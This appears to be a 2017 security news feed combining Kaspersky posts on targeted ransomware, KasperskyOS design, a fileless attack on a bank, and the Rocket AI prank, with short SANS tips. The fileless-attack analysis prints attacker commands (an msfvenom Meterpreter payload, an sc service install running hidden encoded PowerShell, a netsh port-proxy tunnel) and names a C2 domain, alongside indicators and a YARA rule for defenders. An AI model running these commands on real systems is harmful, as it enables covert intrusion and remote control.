An extremely worrying trend which we are observing right now is that ransomware groups with large budgets are shifting from attacking regular users and, occasionally, small companies, towards targeted attacks against relatively large organizations. In one of our incident response cases we have seen a targeted attack against a company with more than 200 workstations, and in another case one had more than 1000.

The mechanics of these new attacks are very different to what we’ve been used to seeing.

  • For initial infection they have not used exploit packs, or spear phishing spam. Instead, if they were able to find a server belonging to the targeted company, they tried to hack it
  • To get into the organization’s network, this group used open source exploits and tools
  • If the organization had an unprotected server with RDP access this group tried to use brute force against it
  • To get the necessary access rights to install ransomware in the network with psexec they used a Mimikatz tool.
  • Then they could establish persistence using an open sourced RAT tool called PUPY
  • Once they had gained a foothold in the attacked network, they studied it, choose the most important files and encrypted them with a custom, yet unseen, build of ransomware.

Another group which we have found in another large organization did not use any ransomware at all. They encrypted data manually. To do this they choose important files on a server and move it into a password protected archive.


In both cases described above the actors demonstrated a modus operandi that is characteristic of targeted attack actors – while we’re almost 100% sure that the groups behind these attacks are the ones that previously worked mostly on widespread ransomware campaigns. There are two main reasons why we think ransomware actors are starting to implement targeted methods in their operations.

1. Thanks to multiple successful massive campaigns they’re now funded well enough to invest big money in sophisticated operations.

2. A ransomware attack against a large corporation makes total sense, because it is possible to paralyze the work of a whole company, resulting in huge losses. Due to this, it is possible to demand a ransom larger than the one requested from home users and small companies.

We have already seen a mutation of this kind with another dangerous type of malicious activity: the financial cyberattack. These also started as massive attacks against the users of online banking. But as time passed, the actors behind these campaigns shifted their interests, firstly to small and medium companies, and then to large corporations, the banks themselves.

It is also important to note that so far the ransomware business has been considered a safe one by criminals. This is due to their certainty that the use of crypto currencies allows them to avoid being tracked by the “follow the money” principle, as well as the lack of arrests of gangs involved in ransomware. From our perspective all these conclusions are wrong. We hope that law enforcement agencies will soon start paying more attention to these groups.

Sun Tzu said: If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained, you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.

This article has two main purposes: to educate people interested in fighting ransomware and to raise awareness of the problem which targeted attacks with the use of ransomware can bring.

Although well-publicized prosecution cases against ransomware actors are yet to take place, people and companies can act now to make the job of ransomware actors harder and protect their data. First of all, make regular backups and store them on a drive that is air-gapped from your organization’s main network.

Don’t forget to protect your servers with proven security solutions. They identify and block the most recent versions of ransomware strains.

And the main advice – DO NOT PAY! If you pay the ransom, you money will be pumped into the malicious ecosystem, which is already flooded with funds. The more money criminals get, the more sophisticated tools they get access to, giving them access to much broader attack opportunities.

If You Are a Victim of Identity Theft

SANS Tip of the Day - Mon, 02/13/2017 - 00:00
Report any identity theft immediately by following these steps:Contact the three major credit bureaus and have them place a fraud alert on your credit report.If a credit card was involved, contact the credit card company and have a new credit card with a new number issued.Contact your local law enforcement agency and file a report.File a complaint with the Federal Trade Commission.Document all conversations so you know whom you spoke to and when.

Features of secure OS realization

Malware Alerts - Thu, 02/09/2017 - 07:55

There are generally accepted principles that developers of all secure operating systems strive to apply, but there can be completely different approaches to implementing these principles. A secure operating system can be developed from an existing OS by improving certain characteristics that are the cause (or the consequence) of that operating system’s insecure behavior, or it can be developed from scratch. The former approach has the clear advantage of lower development costs and compatibility with a broad range of software.

Let’s consider this approach in the context of systems that are part of the critical infrastructure. Two factors are important for such systems:

  • The ability to fulfil special security requirements, which may involve not only preserving certain general properties of information (such as confidentiality), but such things as tracking certain commands and data flows, having no impact on process execution in the system, etc.

  • The provision of guarantees that the system will work securely and will not be compromised.

Building a secure system based on a popular OS commonly involves implementing additional mechanisms of access control (e.g., based on the mandatory access control model), strengthened authentication, data encryption, security event auditing, and application execution control. As a rule, these are standard security measures, with the system’s special requirements addressed at the application level. As a result, special (and often also general) security measures rely on the implementation of numerous components, each of which can be compromised. Examples include: SELinux, RSBAC, AppArmor, TrustedBSD, МСВС, and Astra Linux, etc.

To improve security, tools that make it more difficult to exploit some vulnerabilities, including those inherent in the system due to its insecure original design, can be built into the system. Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.

Only a few years ago, a commonly used approach was to provide “security” guarantees based on scanning software code for errors and vulnerabilities and checking software integrity by comparing checksums. That approach was used in Openwall Linux, and some operating systems developed in Russia.

Although these measures lead to an overall improvement in the characteristics of general-purpose systems, they cannot address the special requirements for systems that are part of the critical infrastructure or guarantee security with a high degree of confidence.

Unlike initiatives based on attempts to improve the security of existing operating systems, KasperskyOS was, from the start, designed based on architectural principles that can ensure its secure behavior, that meets the requirements of special-purpose systems.

However, operating systems originally designed as secure cannot always guarantee that specific security policies will be enforced. Objective reasons for this include the difficulty of specifying clear security goals for such a relatively versatile IT product as an operating system, as well as the large number and variety of threats posed by the environment.

If an operating system is designed for specific uses on a more or less fixed range of hardware, with specific software running under it within defined operating scenarios, then security goals can be defined with sufficient accuracy and a threat model can be built. To achieve security goals, the model is used to develop a specific list of security requirements and trust requirements. Fulfilling these requirements is sufficient to guarantee the system’s secure behavior. Examples include specialized embedded solutions from LynuxWorks, Wind River, and Green Hills.

For a general-purpose operating system, achieving the same guarantees is more difficult due to a broader definition of security goals (which is necessary for the system to support a broader range of secure execution scenarios). As a rule, this requires support for a whole class of policies that are needed for a specific access control type (discretionary, mandatory, role-based), customary authentication mechanisms, and other protection tools whose management does not require specialist knowledge. This requires implementing relatively universal security mechanisms. Sometimes, provided that the OS runs on a fixed hardware platform (usually from the same vendor), compliance of these mechanisms with a certain standard or security profile can be guaranteed with a sufficient degree of confidence. Examples include: Oracle Solaris with Trusted Extensions, XTS-400, and OpenVMS, AS/400.

Finally, for a general-purpose operating system that runs on an arbitrary hardware platform, achieving high security guarantees is even harder because in this case the threat model grows out of all proportion.

This problem can be solved using an approach based on building a modular system from trusted components which are small and which implement standardized interfaces. The architecture of a secure system built in this way makes it possible to port a relatively small amount of software code to various hardware platforms and verify it, while keeping top-level modules so that they can be reused. Potentially, this makes it possible to provide security guarantees for each specific use of the OS.

The development model of the KasperskuOS operating system is based on implementing small trusted low-level components which enable top-level components to be reused. This provides maximum flexibility and efficiency in tailoring the system for the specific needs of a particular deployment, while maintaining the verifiability of its security properties.

The first step towards creating a modular operating system is using a microkernel-based architecture. The microkernel is the system’s only method of interaction and data exchange, providing total access control.

However, access control provided by the microkernel cannot implement properties of the system related to supporting specific security policies. KasperskyOS implements the principle of separating access-related decisions based on the policy defined from access control implemented at the microkernel level. Access decisions based on computing security policy compliance verdicts are made by a dedicated component – the security server. Flask is the best known architecture based on this principle.

It should be noted that a number of enhanced-security operating systems (SELinux, SEBSD) based on general-purpose systems have been built using the Flask architecture, but these systems use a large monolithic kernel. In fact, Flask does not require using a microkernel, but it works best with one.

KasperskyOS does not reproduce the Flask architecture in full but develops its ideas to provide better security and flexibility of use in target systems. The original Flask architecture describes interfaces and requirements for the two main components involved in applying security policies to interaction – a security server, which computes security verdicts, and an object manager, which provides access based on these verdicts. The development of KasperskyOS is, to a large extent, focused on preserving trust not only for mechanisms that compute and apply verdicts, but also for the configuration based on which this computation is performed. Basic security policies are combined into more sophisticated rules using a configuration language. These rules are then compiled into a component that acts as an intermediary between the security server and the microkernel, enabling verdicts to be computed in a way that provides the required business logic.

The major architectural difference between KasperskyOS and other secure operating systems available in the market is that the former implements security policies for each specific deployment of the OS. Support for those policies which are not needed is simply not included in the system. As a result, in each deployment of the operating system the security subsystem provides only required functionality, excluding everything that is not needed.

As a result, KasperskyOS provides configuration of overall security policy parameters (system-wide configuration at the security server level) and rules for applying policies to each operation performed by each entity in the system (through configuration of verdict computation).

The trusted code obtained by compiling configurations connects application software with the security model in the system, specifying which operations performed by programs should be governed by which security policies. Importantly, the code does not include any information about operations or policies except references to them.

The architecture of KasperskyOS supports flexibility, applying policies to individual operations performed by different types of processes (without potentially jeopardizing security through possible compromise of the configuration).

Of course, a microkernel-based system that has Flask-like architecture is not a unique idea invented by KasperskyOS developers. There is a history of successful microkernel development (seL4, PikeOS, Feniks/Febos), including microkernels with formally verified security properties. This work can be used to implement an OS that can guarantee security domain isolation (provide “security through isolation”) – an architecture known as MILS (Multiple Independent Domains of Safety/Security).

However, this case involves developing not just a microkernel but a fully-functional operating system that provides not only the separation of security domains and isolation of incompatible information processing environments, but also control of security policy compliance within these domains. Importantly, the microkernel, the infrastructure of the OS based on it and the security policies are developed by the same vendor. Using third-party work, even if it is of high quality, always imposes limitations.

KasperskyOS is based on a microkernel developed in-house, because this provides the greatest freedom in implementing the required security architecture.

The greatest shortcoming of operating systems built from scratch is the lack of support for existing software. In part, this shortcoming can be compensated for by maintaining compatibility with popular programming interfaces, the best known of which is POSIX.

This shortcoming is also successfully remedied by using virtualization. A secure operating system in whose environment a hypervisor for virtualizing a general-purpose system can be launched, will be able to execute software for that OS. KasperskyOS, together with Kaspersky Secure Hypervisor, provides this capability. Provided that certain conditions are met, an insecure general-purpose IS can inherit the security properties of the host OS.

KasperskyOS is built with modern trends in the development and use of operating systems in mind, in order to implement efficient, practical and secure solutions.

To summarize, the KasperskyOS secure operating system is not an extension or improvement of existing operating systems, but this does not narrow the range of its applications. The system can be used as a foundation for developing solutions that have special security requirements. Capabilities related to providing flexible and effective application execution control are inherent in the architecture of KasperskyOS. The system’s development is based on security product implementation best practices and supported by scientific and practical research.

Fileless attacks against enterprise networks

Malware Alerts - Wed, 02/08/2017 - 03:58

During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memories and hard drives. Unfortunately, each of these storage media has a limited timeframe when the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on its activity, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH“.


This threat was originally discovered by a bank’s security team, after detecting Meterpreter code inside the physical memory of a domain controller (DC). Kaspersky Lab’s product detection names for such kinds of threat are MEM:Trojan.Win32.Cometer and MEM:Trojan.Win32.Metasploit. Kaspersky Lab participated in the forensic analysis after this attack was detected, discovering the use of PowerShell scripts within the Windows registry. Additionally it was discovered that the NETSH utility as used for tunnelling traffic from the victim’s host to the attacker´s C2.

We know that the Metasploit framework was used to generate scripts like the following one:

This script allocates memory, resolves WinAPIs and downloads the Meterpreter utility directly to RAM. These kind of scripts may be generated by using the Metasploit Msfvenom utility with the following command line options:

  • msfvenom -p windows/meterpreter/bind_hidden_tcp AHOST= -f psh-cmd

After the successful generation of a script, the attackers used the SC utility to install a malicious service (that will execute the previous script) on the target host. This can be done, for example, using the following command:

  • sc \\target_name create ATITscUA binpath= “C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden e aQBmACgAWwBJAG4AdABQAHQA…” start= manual

The next step after installing the malicious service would be to set up tunnels to access to the infected machine from remote hosts, for example using the following command:

  • netsh interface portproxy add v4tov4 listenport=4444 connectaddress= connectport=8080 listenaddress=

That would result in all network traffic from being forwarded to This technique of setting up proxy tunnels will provide the attackers with the ability to control any PowerShell infected host from remote Internet hosts.

The use of the “SC” and “NETSH” utilities requires administrator privileges both in local and remote host. The use of malicious PowerShell scripts also requires privilege escalation and execution policy changes. In order to achieve this, attackers used credentials from Service accounts with administrative privileges (for example backup, service for remote task scheduler, etc.) grabbed by Mimikatz.


The analysis of memory dumps and Windows registries from affected machines allowed us to restore both Meterpreter and Mimikatz. These tools were used to collect passwords of system administrators and for the remote administration of infected hosts.

In order to get the PowerShell payload used by the attackers from the memory dumps, we used the following BASH commands:

  • cat mal_powershell.ps1_4 | cut -f12 -d” ” | base64 -di | cut -f8 -d\’ | base64 -di | zcat – | cut -f2 -d\( | cut -f2 -d\” | less | grep \/ | base64 -di | hd

Resulting in the following payload:

Part of a code responsible for downloading Meterpreter from “adobeupdates.sytes[.]net”


Using the Kaspersky Security Network we found more than 100 enterprise networks infected with malicious PowerShell scripts in the registry. These are detected as Trojan.Multi.GenAutorunReg.c and HEUR:Trojan.Multi.Powecod.a. The table below show the number of infections per country.

However we cannot confirm that all of them were infected by the same attacker.


During our analysis of the affected bank we learned that the attackers had used several third level domains and domains in the .GA, .ML, .CF ccTLDs. The trick of using such domains is that they are free and missing WHOIS information after domain expiration. Given that the attackers used the Metasploit framework, standard Windows utilities and unknown domains with no WHOIS information, this makes attribution almost impossible. This closest groups with the same TTPs are GCMAN and Carbanak.


Techniques like those described in this report are becoming more common, especially against relevant targets in the banking industry. Unfortunately the use of common tools combined with different tricks makes detection very hard.

In fact, detection of this attack would be possible in RAM, network and registry only. Please check the Appendix I – Indicators of Compromise section for more details on how to detect malicious activity related to this fileless PowerShell attack.

After successful disinfection and cleaning, it is necessary to change all passwords. This attack shows how no malware samples are needed for successful exfiltration of a network and how standard and open source utilities make attribution almost impossible.

Further details of these attacks and their objectives will be presented at the Security Analyst Summit, to be held on St. Maarten from 2 to 6 April, 2017.

For more information please contact:

Appendix I – Indicators of Compromise

To find the host used by an attacker using the technique described for remote connections and password collection, the following paths in the Windows registry should be analyzed:

  • HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the SC utility
  • HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the NETSH utility

In unallocated space in the Windows registry, the following artefacts might be found:

  • powershell.exe -nop -w hidden -e

Please note that these IPs are taken from the IR case in which we participated, so there could be any other IP used by an eventual attacker. These artefacts indicate the use of PowerShell scripts as a malicious service and the use of the NETSH utility for building tunnels.


  • MEM:Trojan.Win32.Cometer
  • MEM:Trojan.Win32.Metasploit
  • Trojan.Multi.GenAutorunReg.c
  • HEUR:Trojan.Multi.Powecod
Appendix II – Yara Rules rule msf_or_tunnel_in_registry { strings: $port_number_in_registry = "/4444" $hidden_powershell_in_registry = "powershell.exe -nop -w hidden" wide condition: uint32(0)==0x66676572 and any of them }

Securely Disposing Mobile Devices

SANS Tip of the Day - Wed, 02/08/2017 - 00:00
Do you plan on giving away or selling one of your older mobile devices? Make sure you wipe or reset your device before disposing of it. If you don't, the next person who owns it will have access to all of your accounts and personal information.

Rocket AI and the next generation of AV software

Malware Alerts - Tue, 02/07/2017 - 03:56

The annual Conference on Artificial Intelligence and Neural Information Processing Systems (NIPS) was held in Barcelona on 5–10 December 2016. This is, most likely, one of the two most important conferences in the AI field. This year, 5,680 AI experts attended the conference (the second of these large conferences is known as ICML).

This is not the first year that Kaspersky Lab is taking part in the conference – it is paramount for our experts to be well informed on the most up-to-date approaches to machine learning. This time, there were five Kaspersky Lab employees at NIPS, each from a different department and each working with machine learning implementation in order to protect users from cyberthreats.

However, my intent is to tell you not about the benefit of attending the conference but about an amusing incident that was devised and put into action by AI luminaries.

Rocket AI is the Next Generation of Applied AI

This story was covered in detail by Medium, and I shall only briefly relate the essence of the matter.

Right as the conference was happening, the website was created with this bubble on the main page (see picture below):

Please note that this is not just AI, but the next generation of AI. The idea of the product is described below.

The Temporally Recurrent Optimal Learning™ approach (abbreviated as “TROL(L)”), which was not yet known to science, was actively promoted on Twitter by conference participants. Within several hours, this resulted in five large companies contacting the project’s authors with investment offers. The value of the “project” was estimated at tens of millions of dollars.

Now, it’s time to lay the cards on the table: the Rocket AI project was created by experts in machine learning as a prank whose goal was to draw attention to the issue that was put perfectly into words by an author at “Artificial Intelligence has become the most hyped sector of technology. With national press reporting on its dramatic potential, large corporations and investors are desperately trying to break into this field. Many start-ups go to great lengths to emphasize their use of “machine learning” in their pitches, however trivial it may seem. The tech press celebrates companies with no products, that contribute no new technology, and at overly-inflated cost.”

In reality, the field of machine learning features nothing new; popular approaches to artificial intelligence are actually decades-old ideas.

“Clever teams are exploiting the obscurity and cachet of this field to raise more money, knowing that investors and the press have little understanding of how machine learning works in practice,” the author added.

An Anti-Virus of the Very Next Generation

It may seem that the outcome of the prank brought out nothing new: investors feel weakness for everything they hear about. Investment bubbles have existed and will continue to exist. Just our generation saw the advent of dotcoms, biometrics, and bitcoins. We have AI now, and I am sure that 2017 will give us something new as well.

Yet, after I had taken a peek at data-security start-ups, which are springing up like mushrooms after a rain and which claim that they employ the “very real” AI (of the very next generation), an amusing idea crossed my mind.

What would happen if we did the same thing that the respected AI experts did? We could come to agreements with other representatives in the cybersecurity area (I would like to point out the principle of “coopetition”, which combines market competition and cooperation in the areas of inspection and user protection) and create a joint project. Meet Rocket AV.

If respected IT experts were to advertise it all over their Twitter accounts, then — who knows? — maybe we could attract tens of millions of dollars’ worth of investments.

But no, it’d probably be better for us to continue doing what we are best at: protecting users from cyberthreats. This is the essence of True CyberSecurity.

Unique Passwords

SANS Tip of the Day - Tue, 02/07/2017 - 00:00
Make sure each of your accounts has a separate, unique password. Can't remember all of your passwords/passphrases? Consider using a password manager to securely store all of them for you.